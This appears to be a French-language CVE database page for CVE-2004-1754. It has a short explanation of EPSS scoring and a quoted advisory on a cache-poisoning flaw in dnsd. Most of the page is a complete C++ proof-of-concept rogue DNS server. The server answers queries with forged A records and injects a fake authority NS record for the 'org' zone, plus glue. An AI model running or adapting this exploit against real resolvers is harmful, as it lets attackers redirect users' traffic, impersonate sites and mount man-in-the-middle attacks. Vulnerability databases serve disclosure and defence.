CVE-2004-1754 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

source: https://www.securityfocus.com/bid/10557/info It is reported that dnsd is prone to a cache poisoning vulnerability. Dnsd does not ensure that the data returned from a remote DNS server contains related information about the requested records. An attacker could exploit this vulnerability to deny service to legitimate users by redirecting traffic to inappropriate hosts. Man-in-the-middle attacks, impersonation of sites, and other attacks may be possible. // PoC poisoning cache attack SEF 8 and later (by fryxar) // Requires poslib 1.0.4 library // Compile: g++ `poslib-config --libs --cflags --server` poc.cpp -o poc #define POS_DEFAULTLOG #define POS_DEFAULTLOG_STDERR #define POS_DEFAULTLOG_SYSLOG // Server include file #include <poslib/server/server.h> // For signal handling #include <stdlib.h> #include <signal.h> char *dyndomain; DnsMessage *my_handle_query(pending_query *query); void cleanup(int sig) { // close down the server system pos_setquitflag(); } int main(int argc, char **argv) { _addr a; try { /* get command-line arguments */ if (argc != 2 ) { printf( "Usage: %s [domainname]\n", argv[0] ); return 1; } else { dyndomain = argv[1]; txt_to_addr(&a, "any"); } poslib_config_init(); /* bring up posadis */ servers.push_front(ServerSocket(ss_udp, udpcreateserver(&a))); // use the posadis logging system pos_log(context_none, log_info, "Proof of concept DNS server starting up..."); // set signal handlers signal(SIGINT, cleanup); signal(SIGTERM, cleanup); // set query function handle_query = my_handle_query; // run server posserver_run(); } catch (PException p) { printf("Fatal exception: %s\n", p.message); return 1; } return 0; } /* the entry function which will handle all queries */ DnsMessage *my_handle_query(pending_query *query) { DnsMessage *a = new DnsMessage(); DnsQuestion q; DnsRR rr; /* set a as an answer to the query */ a->ID = query->message->ID; a->RD = query->message->RD; a->RA = false; if (query->message->questions.begin() == query->message->questions.end()) { /* query did not contain question */ a->RCODE = RCODE_QUERYERR; return a; } q = *query->message->questions.begin(); a->questions.push_back(q); a->QR = true; pos_log(context_server, log_info, "Query: [%s,%s]", q.QNAME.tocstr(), str_qtype(q.QTYPE).c_str()); if (q.QTYPE == DNS_TYPE_A && q.QNAME == dyndomain) { rr = DnsRR(dyndomain, DNS_TYPE_A, CLASS_IN, 3600); string data = rr_fromstring(DNS_TYPE_A, "200.200.200.200"); // Anything... rr.RDLENGTH = data.size(); rr.RDATA = (char *)memdup(data.c_str(), data.size()); a->answers.push_back(rr); rr = DnsRR("org", DNS_TYPE_NS, CLASS_IN, 3600); data = rr_fromstring(DNS_TYPE_NS, "fakedns.com"); rr.RDLENGTH = data.size(); rr.RDATA = (char *)memdup(data.c_str(), data.size()); a->authority.push_back(rr); rr = DnsRR("fakedns.com", DNS_TYPE_A, CLASS_IN, 3600); data = rr_fromstring(DNS_TYPE_A, "200.200.200.201"); // Anything... rr.RDLENGTH = data.size(); rr.RDATA = (char *)memdup(data.c_str(), data.size()); a->additional.push_back(rr); } else { /* we don't want this */ a->RCODE = RCODE_SRVFAIL; } return a; } ######################################################### # End poc.cpp #########################################################